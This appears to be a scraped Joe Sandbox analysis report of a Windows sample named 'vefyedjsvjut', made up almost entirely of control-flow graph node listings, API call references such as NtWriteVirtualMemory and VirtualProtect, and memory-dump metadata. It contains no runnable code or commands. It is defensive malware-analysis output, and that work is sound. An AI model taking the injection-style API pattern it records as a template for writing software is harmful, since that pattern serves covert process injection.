3728->3729 3730 7ff74f581521 3729->3730 3731 7ff74f581530 3730->3731 3732 7ff74f581394 2 API calls 3730->3732 3733 7ff74f581394 2 API calls 3731->3733 3732->3731 3734 7ff74f58153a 3733->3734 3735 7ff74f58153f 3734->3735 3736 7ff74f581394 2 API calls 3734->3736 3737 7ff74f581394 2 API calls 3735->3737 3736->3735 3738 7ff74f58154e 3737->3738 3739 7ff74f581394 2 API calls 3738->3739 3740 7ff74f581558 3739->3740 3741 7ff74f58155d 3740->3741 3742 7ff74f581394 2 API calls 3740->3742 3743 7ff74f581394 2 API calls 3741->3743 3742->3741 3744 7ff74f581567 3743->3744 3745 7ff74f58156c 3744->3745 3746 7ff74f581394 2 API calls 3744->3746 3747 7ff74f581394 2 API calls 3745->3747 3746->3745 3748 7ff74f581576 3747->3748 3749 7ff74f58157b 3748->3749 3750 7ff74f581394 2 API calls 3748->3750 3751 7ff74f581394 2 API calls 3749->3751 3750->3749 3752 7ff74f581585 3751->3752 3753 7ff74f58158a 3752->3753 3754 7ff74f581394 2 API calls 3752->3754 3755 7ff74f581394 2 API calls 3753->3755 3754->3753 3756 7ff74f581599 3755->3756 3757 7ff74f581394 2 API calls 3756->3757 3758 7ff74f5815a3 3757->3758 3759 7ff74f581394 2 API calls 3758->3759 3760 7ff74f5815a8 3759->3760 3761 7ff74f581394 2 API calls 3760->3761 3762 7ff74f5815b7 3761->3762 3763 7ff74f581394 2 API calls 3762->3763 3764 7ff74f5815c6 3763->3764 3765 7ff74f581394 2 API calls 3764->3765 3766 7ff74f5815d5 3765->3766 3767 7ff74f581394 2 API calls 3766->3767 3768 7ff74f5815e4 3767->3768 3769 7ff74f581394 2 API calls 3768->3769 3770 7ff74f5815f3 3769->3770 3770->3144 3772 7ff74f581394 2 API calls 3771->3772 3773 7ff74f581567 3772->3773 3774 7ff74f58156c 3773->3774 3775 7ff74f581394 2 API calls 3773->3775 3776 7ff74f581394 2 API calls 3774->3776 3775->3774 3777 7ff74f581576 3776->3777 3778 7ff74f58157b 3777->3778 3779 7ff74f581394 2 API calls 3777->3779 3780 7ff74f581394 2 API calls 3778->3780 3779->3778 3781 7ff74f581585 3780->3781 3782 7ff74f58158a 3781->3782 3783 7ff74f581394 2 API calls 3781->3783 3784 7ff74f581394 2 API calls 3782->3784 3783->3782 3785 7ff74f581599 3784->3785 3786 7ff74f581394 2 API calls 3785->3786 3787 7ff74f5815a3 3786->3787 3788 7ff74f581394 2 API calls 3787->3788 3789 7ff74f5815a8 3788->3789 3790 7ff74f581394 2 API calls 3789->3790 3791 7ff74f5815b7 3790->3791 3792 7ff74f581394 2 API calls 3791->3792 3793 7ff74f5815c6 3792->3793 3794 7ff74f581394 2 API calls 3793->3794 3795 7ff74f5815d5 3794->3795 3796 7ff74f581394 2 API calls 3795->3796 3797 7ff74f5815e4 3796->3797 3798 7ff74f581394 2 API calls 3797->3798 3799 7ff74f5815f3 3798->3799 3799->3697 3799->3700 3799->3705 3801 7ff74f581394 2 API calls 3800->3801 3802 7ff74f5814f4 3801->3802 3803 7ff74f581394 2 API calls 3802->3803 3804 7ff74f581503 3803->3804 3805 7ff74f581394 2 API calls 3804->3805 3806 7ff74f581512 3805->3806 3807 7ff74f581394 2 API calls 3806->3807 3808 7ff74f581521 3807->3808 3809 7ff74f581530 3808->3809 3810 7ff74f581394 2 API calls 3808->3810 3811 7ff74f581394 2 API calls 3809->3811 3810->3809 3812 7ff74f58153a 3811->3812 3813 7ff74f58153f 3812->3813 3814 7ff74f581394 2 API calls 3812->3814 3815 7ff74f581394 2 API calls 3813->3815 3814->3813 3816 7ff74f58154e 3815->3816 3817 7ff74f581394 2 API calls 3816->3817 3818 7ff74f581558 3817->3818 3819 7ff74f58155d 3818->3819 3820 7ff74f581394 2 API calls 3818->3820 3821 7ff74f581394 2 API calls 3819->3821 3820->3819 3822 7ff74f581567 3821->3822 3823 7ff74f58156c 3822->3823 3824 7ff74f581394 2 API calls 3822->3824 3825 7ff74f581394 2 API calls 3823->3825 3824->3823 3826 7ff74f581576 3825->3826 3827 7ff74f58157b 3826->3827 3828 7ff74f581394 2 API calls 3826->3828 3829 7ff74f581394 2 API calls 3827->3829 3828->3827 3830 7ff74f581585 3829->3830 3831 7ff74f58158a 3830->3831 3832 7ff74f581394 2 API calls 3830->3832 3833 7ff74f581394 2 API calls 3831->3833 3832->3831 3834 7ff74f581599 3833->3834 3835 7ff74f581394 2 API calls 3834->3835 3836 7ff74f5815a3 3835->3836 3837 7ff74f581394 2 API calls 3836->3837 3838 7ff74f5815a8 3837->3838 3839 7ff74f581394 2 API calls 3838->3839 3840 7ff74f5815b7 3839->3840 3841 7ff74f581394 2 API calls 3840->3841 3842 7ff74f5815c6 3841->3842 3843 7ff74f581394 2 API calls 3842->3843 3844 7ff74f5815d5 3843->3844 3845 7ff74f581394 2 API calls 3844->3845 3846 7ff74f5815e4 3845->3846 3847 7ff74f581394 2 API calls 3846->3847 3848 7ff74f5815f3 3847->3848 3848->3697 3850 7ff74f581394 2 API calls 3849->3850 3851 7ff74f581503 3850->3851 3852 7ff74f581394 2 API calls 3851->3852 3853 7ff74f581512 3852->3853 3854 7ff74f581394 2 API calls 3853->3854 3855 7ff74f581521 3854->3855 3856 7ff74f581530 3855->3856 3857 7ff74f581394 2 API calls 3855->3857 3858 7ff74f581394 2 API calls 3856->3858 3857->3856 3859 7ff74f58153a 3858->3859 3860 7ff74f58153f 3859->3860 3861 7ff74f581394 2 API calls 3859->3861 3862 7ff74f581394 2 API calls 3860->3862 3861->3860 3863 7ff74f58154e 3862->3863 3864 7ff74f581394 2 API calls 3863->3864 3865 7ff74f581558 3864->3865 3866 7ff74f58155d 3865->3866 3867 7ff74f581394 2 API calls 3865->3867 3868 7ff74f581394 2 API calls 3866->3868 3867->3866 3869 7ff74f581567 3868->3869 3870 7ff74f58156c 3869->3870 3871 7ff74f581394 2 API calls 3869->3871 3872 7ff74f581394 2 API calls 3870->3872 3871->3870 3873 7ff74f581576 3872->3873 3874 7ff74f58157b 3873->3874 3875 7ff74f581394 2 API calls 3873->3875 3876 7ff74f581394 2 API calls 3874->3876 3875->3874 3877 7ff74f581585 3876->3877 3878 7ff74f58158a 3877->3878 3879 7ff74f581394 2 API calls 3877->3879 3880 7ff74f581394 2 API calls 3878->3880 3879->3878 3881 7ff74f581599 3880->3881 3882 7ff74f581394 2 API calls 3881->3882 3883 7ff74f5815a3 3882->3883 3884 7ff74f581394 2 API calls 3883->3884 3885 7ff74f5815a8 3884->3885 3886 7ff74f581394 2 API calls 3885->3886 3887 7ff74f5815b7 3886->3887 3888 7ff74f581394 2 API calls 3887->3888 3889 7ff74f5815c6 3888->3889 3890 7ff74f581394 2 API calls 3889->3890 3891 7ff74f5815d5 3890->3891 3892 7ff74f581394 2 API calls 3891->3892 3893 7ff74f5815e4 3892->3893 3894 7ff74f581394 2 API calls 3893->3894 3895 7ff74f5815f3 3894->3895 3895->3720 3897 7ff74f581394 2 API calls 3896->3897 3898 7ff74f58142c 3897->3898 3899 7ff74f581431 3898->3899 3900 7ff74f581394 2 API calls 3898->3900 3901 7ff74f581394 2 API calls 3899->3901 3900->3899 3902 7ff74f58143b 3901->3902 3903 7ff74f581440 3902->3903 3904 7ff74f581394 2 API calls 3902->3904 3905 7ff74f581394 2 API calls 3903->3905 3904->3903 3906 7ff74f58144f 3905->3906 3907 7ff74f581394 2 API calls 3906->3907 3908 7ff74f581459 3907->3908 3909 7ff74f58145e 3908->3909 3910 7ff74f581394 2 API calls 3908->3910 3911 7ff74f581394 2 API calls 3909->3911 3910->3909 3912 7ff74f581468 3911->3912 3913 7ff74f58146d 3912->3913 3914 7ff74f581394 2 API calls 3912->3914 3915 7ff74f581394 2 API calls 3913->3915 3914->3913 3916 7ff74f581477 3915->3916 3917 7ff74f58147c 3916->3917 3918 7ff74f581394 2 API calls 3916->3918 3919 7ff74f581394 2 API calls 3917->3919 3918->3917 3920 7ff74f581486 3919->3920 3921 7ff74f58148b 3920->3921 3922 7ff74f581394 2 API calls 3920->3922 3923 7ff74f581394 2 API calls 3921->3923 3922->3921 3924 7ff74f581495 3923->3924 3925 7ff74f581394 2 API calls 3924->3925 3926 7ff74f58149a 3925->3926 3927 7ff74f581394 2 API calls 3926->3927 3928 7ff74f5814a9 3927->3928 3929 7ff74f581394 2 API calls 3928->3929 3930 7ff74f5814b8 3929->3930 3931 7ff74f581394 2 API calls 3930->3931 3932 7ff74f5814c7 3931->3932 3933 7ff74f581394 2 API calls 3932->3933 3934 7ff74f5814d6 3933->3934 3935 7ff74f581394 2 API calls 3934->3935 3936 7ff74f5814e5 3935->3936 3937 7ff74f581394 2 API calls 3936->3937 3938 7ff74f5814f4 3937->3938 3939 7ff74f581394 2 API calls 3938->3939 3940 7ff74f581503 3939->3940 3941 7ff74f581394 2 API calls 3940->3941 3942 7ff74f581512 3941->3942 3943 7ff74f581394 2 API calls 3942->3943 3944 7ff74f581521 3943->3944 3945 7ff74f581530 3944->3945 3946 7ff74f581394 2 API calls 3944->3946 3947 7ff74f581394 2 API calls 3945->3947 3946->3945 3948 7ff74f58153a 3947->3948 3949 7ff74f58153f 3948->3949 3950 7ff74f581394 2 API calls 3948->3950 3951 7ff74f581394 2 API calls 3949->3951 3950->3949 3952 7ff74f58154e 3951->3952 3953 7ff74f581394 2 API calls 3952->3953 3954 7ff74f581558 3953->3954 3955 7ff74f58155d 3954->3955 3956 7ff74f581394 2 API calls 3954->3956 3957 7ff74f581394 2 API calls 3955->3957 3956->3955 3958 7ff74f581567 3957->3958 3959 7ff74f58156c 3958->3959 3960 7ff74f581394 2 API calls 3958->3960 3961 7ff74f581394 2 API calls 3959->3961 3960->3959 3962 7ff74f581576 3961->3962 3963 7ff74f58157b 3962->3963 3964 7ff74f581394 2 API calls 3962->3964 3965 7ff74f581394 2 API calls 3963->3965 3964->3963 3966 7ff74f581585 3965->3966 3967 7ff74f58158a 3966->3967 3968 7ff74f581394 2 API calls 3966->3968 3969 7ff74f581394 2 API calls 3967->3969 3968->3967 3970 7ff74f581599 3969->3970 3971 7ff74f581394 2 API calls 3970->3971 3972 7ff74f5815a3 3971->3972 3973 7ff74f581394 2 API calls 3972->3973 3974 7ff74f5815a8 3973->3974 3975 7ff74f581394 2 API calls 3974->3975 3976 7ff74f5815b7 3975->3976 3977 7ff74f581394 2 API calls 3976->3977 3978 7ff74f5815c6 3977->3978 3979 7ff74f581394 2 API calls 3978->3979 3980 7ff74f5815d5 3979->3980 3981 7ff74f581394 2 API calls 3980->3981 3982 7ff74f5815e4 3981->3982 3983 7ff74f581394 2 API calls 3982->3983 3984 7ff74f5815f3 3983->3984 3984->3605 3986 7ff74f581394 2 API calls 3985->3986 3987 7ff74f58143b 3986->3987 3988 7ff74f581440 3987->3988 3989 7ff74f581394 2 API calls 3987->3989 3990 7ff74f581394 2 API calls 3988->3990 3989->3988 3991 7ff74f58144f 3990->3991 3992 7ff74f581394 2 API calls 3991->3992 3993 7ff74f581459 3992->3993 3994 7ff74f58145e 3993->3994 3995 7ff74f581394 2 API calls 3993->3995 3996 7ff74f581394 2 API calls 3994->3996 3995->3994 3997 7ff74f581468 3996->3997 3998 7ff74f58146d 3997->3998 3999 7ff74f581394 2 API calls 3997->3999 4000 7ff74f581394 2 API calls 3998->4000 3999->3998 4001 7ff74f581477 4000->4001 4002 7ff74f58147c 4001->4002 4003 7ff74f581394 2 API calls 4001->4003 4004 7ff74f581394 2 API calls 4002->4004 4003->4002 4005 7ff74f581486 4004->4005 4006 7ff74f58148b 4005->4006 4007 7ff74f581394 2 API calls 4005->4007 4008 7ff74f581394 2 API calls 4006->4008 4007->4006 4009 7ff74f581495 4008->4009 4010 7ff74f581394 2 API calls 4009->4010 4011 7ff74f58149a 4010->4011 4012 7ff74f581394 2 API calls 4011->4012 4013 7ff74f5814a9 4012->4013 4014 7ff74f581394 2 API calls 4013->4014 4015 7ff74f5814b8 4014->4015 4016 7ff74f581394 2 API calls 4015->4016 4017 7ff74f5814c7 4016->4017 4018 7ff74f581394 2 API calls 4017->4018 4019 7ff74f5814d6 4018->4019 4020 7ff74f581394 2 API calls 4019->4020 4021 7ff74f5814e5 4020->4021 4022 7ff74f581394 2 API calls 4021->4022 4023 7ff74f5814f4 4022->4023 4024 7ff74f581394 2 API calls 4023->4024 4025 7ff74f581503 4024->4025 4026 7ff74f581394 2 API calls 4025->4026 4027 7ff74f581512 4026->4027 4028 7ff74f581394 2 API calls 4027->4028 4029 7ff74f581521 4028->4029 4030 7ff74f581530 4029->4030 4031 7ff74f581394 2 API calls 4029->4031 4032 7ff74f581394 2 API calls 4030->4032 4031->4030 4033 7ff74f58153a 4032->4033 4034 7ff74f58153f 4033->4034 4035 7ff74f581394 2 API calls 4033->4035 4036 7ff74f581394 2 API calls 4034->4036 4035->4034 4037 7ff74f58154e 4036->4037 4038 7ff74f581394 2 API calls 4037->4038 4039 7ff74f581558 4038->4039 4040 7ff74f58155d 4039->4040 4041 7ff74f581394 2 API calls 4039->4041 4042 7ff74f581394 2 API calls 4040->4042 4041->4040 4043 7ff74f581567 4042->4043 4044 7ff74f58156c 4043->4044 4045 7ff74f581394 2 API calls 4043->4045 4046 7ff74f581394 2 API calls 4044->4046 4045->4044 4047 7ff74f581576 4046->4047 4048 7ff74f58157b 4047->4048 4049 7ff74f581394 2 API calls 4047->4049 4050 7ff74f581394 2 API calls 4048->4050 4049->4048 4051 7ff74f581585 4050->4051 4052 7ff74f58158a 4051->4052 4053 7ff74f581394 2 API calls 4051->4053 4054 7ff74f581394 2 API calls 4052->4054 4053->4052 4055 7ff74f581599 4054->4055 4056 7ff74f581394 2 API calls 4055->4056 4057 7ff74f5815a3 4056->4057 4058 7ff74f581394 2 API calls 4057->4058 4059 7ff74f5815a8 4058->4059 4060 7ff74f581394 2 API calls 4059->4060 4061 7ff74f5815b7 4060->4061 4062 7ff74f581394 2 API calls 4061->4062 4063 7ff74f5815c6 4062->4063 4064 7ff74f581394 2 API calls 4063->4064 4065 7ff74f5815d5 4064->4065 4066 7ff74f581394 2 API calls 4065->4066 4067 7ff74f5815e4 4066->4067 4068 7ff74f581394 2 API calls 4067->4068 4069 7ff74f5815f3 4068->4069 4069->3606 4071 7ff74f581394 2 API calls 4070->4071 4072 7ff74f5814c7 4071->4072 4073 7ff74f581394 2 API calls 4072->4073 4074 7ff74f5814d6 4073->4074 4075 7ff74f581394 2 API calls 4074->4075 4076 7ff74f5814e5 4075->4076 4077 7ff74f581394 2 API calls 4076->4077 4078 7ff74f5814f4 4077->4078 4079 7ff74f581394 2 API calls 4078->4079 4080 7ff74f581503 4079->4080 4081 7ff74f581394 2 API calls 4080->4081 4082 7ff74f581512 4081->4082 4083 7ff74f581394 2 API calls 4082->4083 4084 7ff74f581521 4083->4084 4085 7ff74f581530 4084->4085 4086 7ff74f581394 2 API calls 4084->4086 4087 7ff74f581394 2 API calls 4085->4087 4086->4085 4088 7ff74f58153a 4087->4088 4089 7ff74f58153f 4088->4089 4090 7ff74f581394 2 API calls 4088->4090 4091 7ff74f581394 2 API calls 4089->4091 4090->4089 4092 7ff74f58154e 4091->4092 4093 7ff74f581394 2 API calls 4092->4093 4094 7ff74f581558 4093->4094 4095 7ff74f58155d 4094->4095 4096 7ff74f581394 2 API calls 4094->4096 4097 7ff74f581394 2 API calls 4095->4097 4096->4095 4098 7ff74f581567 4097->4098 4099 7ff74f58156c 4098->4099 4100 7ff74f581394 2 API calls 4098->4100 4101 7ff74f581394 2 API calls 4099->4101 4100->4099 4102 7ff74f581576 4101->4102 4103 7ff74f58157b 4102->4103 4104 7ff74f581394 2 API calls 4102->4104 4105 7ff74f581394 2 API calls 4103->4105 4104->4103 4106 7ff74f581585 4105->4106 4107 7ff74f58158a 4106->4107 4108 7ff74f581394 2 API calls 4106->4108 4109 7ff74f581394 2 API calls 4107->4109 4108->4107 4110 7ff74f581599 4109->4110 4111 7ff74f581394 2 API calls 4110->4111 4112 7ff74f5815a3 4111->4112 4113 7ff74f581394 2 API calls 4112->4113 4114 7ff74f5815a8 4113->4114 4115 7ff74f581394 2 API calls 4114->4115 4116 7ff74f5815b7 4115->4116 4117 7ff74f581394 2 API calls 4116->4117 4118 7ff74f5815c6 4117->4118 4119 7ff74f581394 2 API calls 4118->4119 4120 7ff74f5815d5 4119->4120 4121 7ff74f581394 2 API calls 4120->4121 4122 7ff74f5815e4 4121->4122 4123 7ff74f581394 2 API calls 4122->4123 4124 7ff74f5815f3 4123->4124 4124->3678 4126 7ff74f581394 2 API calls 4125->4126 4127 7ff74f5815e4 4126->4127 4128 7ff74f581394 2 API calls 4127->4128 4129 7ff74f5815f3 4128->4129 4129->3678 4131 7ff74f581394 2 API calls 4130->4131 4132 7ff74f581495 4131->4132 4133 7ff74f581394 2 API calls 4132->4133 4134 7ff74f58149a 4133->4134 4135 7ff74f581394 2 API calls 4134->4135 4136 7ff74f5814a9 4135->4136 4137 7ff74f581394 2 API calls 4136->4137 4138 7ff74f5814b8 4137->4138 4139 7ff74f581394 2 API calls 4138->4139 4140 7ff74f5814c7 4139->4140 4141 7ff74f581394 2 API calls 4140->4141 4142 7ff74f5814d6 4141->4142 4143 7ff74f581394 2 API calls 4142->4143 4144 7ff74f5814e5 4143->4144 4145 7ff74f581394 2 API calls 4144->4145 4146 7ff74f5814f4 4145->4146 4147 7ff74f581394 2 API calls 4146->4147 4148 7ff74f581503 4147->4148 4149 7ff74f581394 2 API calls 4148->4149 4150 7ff74f581512 4149->4150 4151 7ff74f581394 2 API calls 4150->4151 4152 7ff74f581521 4151->4152 4153 7ff74f581530 4152->4153 4154 7ff74f581394 2 API calls 4152->4154 4155 7ff74f581394 2 API calls 4153->4155 4154->4153 4156 7ff74f58153a 4155->4156 4157 7ff74f58153f 4156->4157 4158 7ff74f581394 2 API calls 4156->4158 4159 7ff74f581394 2 API calls 4157->4159 4158->4157 4160 7ff74f58154e 4159->4160 4161 7ff74f581394 2 API calls 4160->4161 4162 7ff74f581558 4161->4162 4163 7ff74f58155d 4162->4163 4164 7ff74f581394 2 API calls 4162->4164 4165 7ff74f581394 2 API calls 4163->4165 4164->4163 4166 7ff74f581567 4165->4166 4167 7ff74f58156c 4166->4167 4168 7ff74f581394 2 API calls 4166->4168 4169 7ff74f581394 2 API calls 4167->4169 4168->4167 4170 7ff74f581576 4169->4170 4171 7ff74f58157b 4170->4171 4172 7ff74f581394 2 API calls 4170->4172 4173 7ff74f581394 2 API calls 4171->4173 4172->4171 4174 7ff74f581585 4173->4174 4175 7ff74f58158a 4174->4175 4176 7ff74f581394 2 API calls 4174->4176 4177 7ff74f581394 2 API calls 4175->4177 4176->4175 4178 7ff74f581599 4177->4178 4179 7ff74f581394 2 API calls 4178->4179 4180 7ff74f5815a3 4179->4180 4181 7ff74f581394 2 API calls 4180->4181 4182 7ff74f5815a8 4181->4182 4183 7ff74f581394 2 API calls 4182->4183 4184 7ff74f5815b7 4183->4184 4185 7ff74f581394 2 API calls 4184->4185 4186 7ff74f5815c6 4185->4186 4187 7ff74f581394 2 API calls 4186->4187 4188 7ff74f5815d5 4187->4188 4189 7ff74f581394 2 API calls 4188->4189 4190 7ff74f5815e4 4189->4190 4191 7ff74f581394 2 API calls 4190->4191 4192 7ff74f5815f3 4191->4192 4192->3671 4193 7ff74f58149a 4192->4193 4194 7ff74f581394 2 API calls 4193->4194 4195 7ff74f5814a9 4194->4195 4196 7ff74f581394 2 API calls 4195->4196 4197 7ff74f5814b8 4196->4197 4198 7ff74f581394 2 API calls 4197->4198 4199 7ff74f5814c7 4198->4199 4200 7ff74f581394 2 API calls 4199->4200 4201 7ff74f5814d6 4200->4201 4202 7ff74f581394 2 API calls 4201->4202 4203 7ff74f5814e5 4202->4203 4204 7ff74f581394 2 API calls 4203->4204 4205 7ff74f5814f4 4204->4205 4206 7ff74f581394 2 API calls 4205->4206 4207 7ff74f581503 4206->4207 4208 7ff74f581394 2 API calls 4207->4208 4209 7ff74f581512 4208->4209 4210 7ff74f581394 2 API calls 4209->4210 4211 7ff74f581521 4210->4211 4212 7ff74f581530 4211->4212 4213 7ff74f581394 2 API calls 4211->4213 4214 7ff74f581394 2 API calls 4212->4214 4213->4212 4215 7ff74f58153a 4214->4215 4216 7ff74f58153f 4215->4216 4217 7ff74f581394 2 API calls 4215->4217 4218 7ff74f581394 2 API calls 4216->4218 4217->4216 4219 7ff74f58154e 4218->4219 4220 7ff74f581394 2 API calls 4219->4220 4221 7ff74f581558 4220->4221 4222 7ff74f58155d 4221->4222 4223 7ff74f581394 2 API calls 4221->4223 4224 7ff74f581394 2 API calls 4222->4224 4223->4222 4225 7ff74f581567 4224->4225 4226 7ff74f58156c 4225->4226 4227 7ff74f581394 2 API calls 4225->4227 4228 7ff74f581394 2 API calls 4226->4228 4227->4226 4229 7ff74f581576 4228->4229 4230 7ff74f58157b 4229->4230 4231 7ff74f581394 2 API calls 4229->4231 4232 7ff74f581394 2 API calls 4230->4232 4231->4230 4233 7ff74f581585 4232->4233 4234 7ff74f58158a 4233->4234 4235 7ff74f581394 2 API calls 4233->4235 4236 7ff74f581394 2 API calls 4234->4236 4235->4234 4237 7ff74f581599 4236->4237 4238 7ff74f581394 2 API calls 4237->4238 4239 7ff74f5815a3 4238->4239 4240 7ff74f581394 2 API calls 4239->4240 4241 7ff74f5815a8 4240->4241 4242 7ff74f581394 2 API calls 4241->4242 4243 7ff74f5815b7 4242->4243 4244 7ff74f581394 2 API calls 4243->4244 4245 7ff74f5815c6 4244->4245 4246 7ff74f581394 2 API calls 4245->4246 4247 7ff74f5815d5 4246->4247 4248 7ff74f581394 2 API calls 4247->4248 4249 7ff74f5815e4 4248->4249 4250 7ff74f581394 2 API calls 4249->4250 4251 7ff74f5815f3 4250->4251 4251->3671 4251->3682 4253 7ff74f581394 2 API calls 4252->4253 4254 7ff74f581486 4253->4254 4255 7ff74f58148b 4254->4255 4256 7ff74f581394 2 API calls 4254->4256 4257 7ff74f581394 2 API calls 4255->4257 4256->4255 4258 7ff74f581495 4257->4258 4259 7ff74f581394 2 API calls 4258->4259 4260 7ff74f58149a 4259->4260 4261 7ff74f581394 2 API calls 4260->4261 4262 7ff74f5814a9 4261->4262 4263 7ff74f581394 2 API calls 4262->4263 4264 7ff74f5814b8 4263->4264 4265 7ff74f581394 2 API calls 4264->4265 4266 7ff74f5814c7 4265->4266 4267 7ff74f581394 2 API calls 4266->4267 4268 7ff74f5814d6 4267->4268 4269 7ff74f581394 2 API calls 4268->4269 4270 7ff74f5814e5 4269->4270 4271 7ff74f581394 2 API calls 4270->4271 4272 7ff74f5814f4 4271->4272 4273 7ff74f581394 2 API calls 4272->4273 4274 7ff74f581503 4273->4274 4275 7ff74f581394 2 API calls 4274->4275 4276 7ff74f581512 4275->4276 4277 7ff74f581394 2 API calls 4276->4277 4278 7ff74f581521 4277->4278 4279 7ff74f581530 4278->4279 4280 7ff74f581394 2 API calls 4278->4280 4281 7ff74f581394 2 API calls 4279->4281 4280->4279 4282 7ff74f58153a 4281->4282 4283 7ff74f58153f 4282->4283 4284 7ff74f581394 2 API calls 4282->4284 4285 7ff74f581394 2 API calls 4283->4285 4284->4283 4286 7ff74f58154e 4285->4286 4287 7ff74f581394 2 API calls 4286->4287 4288 7ff74f581558 4287->4288 4289 7ff74f58155d 4288->4289 4290 7ff74f581394 2 API calls 4288->4290 4291 7ff74f581394 2 API calls 4289->4291 4290->4289 4292 7ff74f581567 4291->4292 4293 7ff74f58156c 4292->4293 4294 7ff74f581394 2 API calls 4292->4294 4295 7ff74f581394 2 API calls 4293->4295 4294->4293 4296 7ff74f581576 4295->4296 4297 7ff74f58157b 4296->4297 4298 7ff74f581394 2 API calls 4296->4298 4299 7ff74f581394 2 API calls 4297->4299 4298->4297 4300 7ff74f581585 4299->4300 4301 7ff74f58158a 4300->4301 4302 7ff74f581394 2 API calls 4300->4302 4303 7ff74f581394 2 API calls 4301->4303 4302->4301 4304 7ff74f581599 4303->4304 4305 7ff74f581394 2 API calls 4304->4305 4306 7ff74f5815a3 4305->4306 4307 7ff74f581394 2 API calls 4306->4307 4308 7ff74f5815a8 4307->4308 4309 7ff74f581394 2 API calls 4308->4309 4310 7ff74f5815b7 4309->4310 4311 7ff74f581394 2 API calls 4310->4311 4312 7ff74f5815c6 4311->4312 4313 7ff74f581394 2 API calls 4312->4313 4314 7ff74f5815d5 4313->4314 4315 7ff74f581394 2 API calls 4314->4315 4316 7ff74f5815e4 4315->4316 4317 7ff74f581394 2 API calls 4316->4317 4318 7ff74f5815f3 4317->4318 4318->3687 4320 7ff74f581394 2 API calls 4319->4320 4321 7ff74f5815d5 4320->4321 4322 7ff74f581394 2 API calls 4321->4322 4323 7ff74f5815e4 4322->4323 4324 7ff74f581394 2 API calls 4323->4324 4325 7ff74f5815f3 4324->4325 4325->3688 4335 7ff74f581000 4336 7ff74f58108b __set_app_type 4335->4336 4337 7ff74f581040 4335->4337 4338 7ff74f5810b6 4336->4338 4337->4336 4339 7ff74f5810e5 4338->4339 4341 7ff74f581e00 4338->4341 4342 7ff74f588980 __setusermatherr 4341->4342 4343 7ff74f581800 4344 7ff74f581812 4343->4344 4345 7ff74f581835 fprintf 4344->4345 4413 7ff74f582320 strlen 4414 7ff74f582337 4413->4414 4384 7ff74f581f47 4385 7ff74f581e67 signal 4384->4385 4388 7ff74f581e99 4384->4388 4386 7ff74f581e7c 4385->4386 4385->4388 4387 7ff74f581e82 signal 4386->4387 4386->4388 4387->4388 2724 7ff74f581394 2728 7ff74f5883f0 2724->2728 2726 7ff74f5813b8 2727 7ff74f5813c6 NtWriteVirtualMemory 2726->2727 2729 7ff74f58840e 2728->2729 2732 7ff74f58843b 2728->2732 2729->2726 2730 7ff74f5884e3 2731 7ff74f5884ff malloc 2730->2731 2733 7ff74f588520 2731->2733 2732->2729 2732->2730 2733->2729 4415 7ff74f581ab3 4416 7ff74f581ade 4415->4416 4417 7ff74f581b36 4416->4417 4419 7ff74f58199e 4416->4419 4420 7ff74f581a0f 4416->4420 4418 7ff74f581ba0 4 API calls 4417->4418 4421 7ff74f581b53 4418->4421 4419->4420 4422 7ff74f5819e9 VirtualProtect 4419->4422 4422->4419 4346 7ff74f581e10 4347 7ff74f581e2f 4346->4347 4348 7ff74f581eb5 4347->4348 4349 7ff74f581ecc 4347->4349 4352 7ff74f581e55 4347->4352 4349->4348 4350 7ff74f581ed3 signal 4349->4350 4350->4348 4351 7ff74f581ee4 4350->4351 4351->4348 4353 7ff74f581eea signal 4351->4353 4352->4348 4354 7ff74f581f12 signal 4352->4354 4353->4348 4354->4348 4368 7ff74f581a70 4369 7ff74f58199e 4368->4369 4372 7ff74f581a7d 4368->4372 4370 7ff74f581a0f 4369->4370 4371 7ff74f5819e9 VirtualProtect 4369->4371 4371->4369 4397 7ff74f582050 4398 7ff74f58205e EnterCriticalSection 4397->4398 4399 7ff74f5820cf 4397->4399 4400 7ff74f5820c2 LeaveCriticalSection 4398->4400 4401 7ff74f582079 4398->4401 4400->4399 4401->4400 4402 7ff74f5820bd free 4401->4402 4402->4400 4403 7ff74f581fd0 4404 7ff74f582033 4403->4404 4405 7ff74f581fe4 4403->4405 4405->4404 4406 7ff74f581ffd EnterCriticalSection LeaveCriticalSection 4405->4406 4406->4404 4373 7ff74f58216f 4374 7ff74f582178 InitializeCriticalSection 4373->4374 4375 7ff74f582185 4373->4375 4374->4375

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001C.00000002.1951171525.00007FF74F581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF74F580000, based on PE: true
                                                                                                                                • Associated: 0000001C.00000002.1951151797.00007FF74F580000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951201756.00007FF74F589000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951227756.00007FF74F58B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                • Associated: 0000001C.00000002.1951501503.00007FF74F80A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_28_2_7ff74f580000_vefyedjsvjut.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2643109117-0
                                                                                                                                • Opcode ID: 2bc85885fa4b20875cecf45e0d5a8d7643269e07cdbabcb3a286f5e8c3ee789d
                                                                                                                                • Instruction ID: 64304b629169cfcb2f54c615694669b61ebb4c3a3b78c284c43912121bc71bf3
                                                                                                                                • Opcode Fuzzy Hash: 2bc85885fa4b20875cecf45e0d5a8d7643269e07cdbabcb3a286f5e8c3ee789d
                                                                                                                                • Instruction Fuzzy Hash: CA512731A1DAC6C5F610BB16E9503F9EBA4AF84B80FC55431C96E473A2DF2CE4A18720
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF74F581156), ref: 00007FF74F5813F7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001C.00000002.1951171525.00007FF74F581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF74F580000, based on PE: true
                                                                                                                                • Associated: 0000001C.00000002.1951151797.00007FF74F580000.00000002.00000001.01000000.00000007.sdmpDownload File
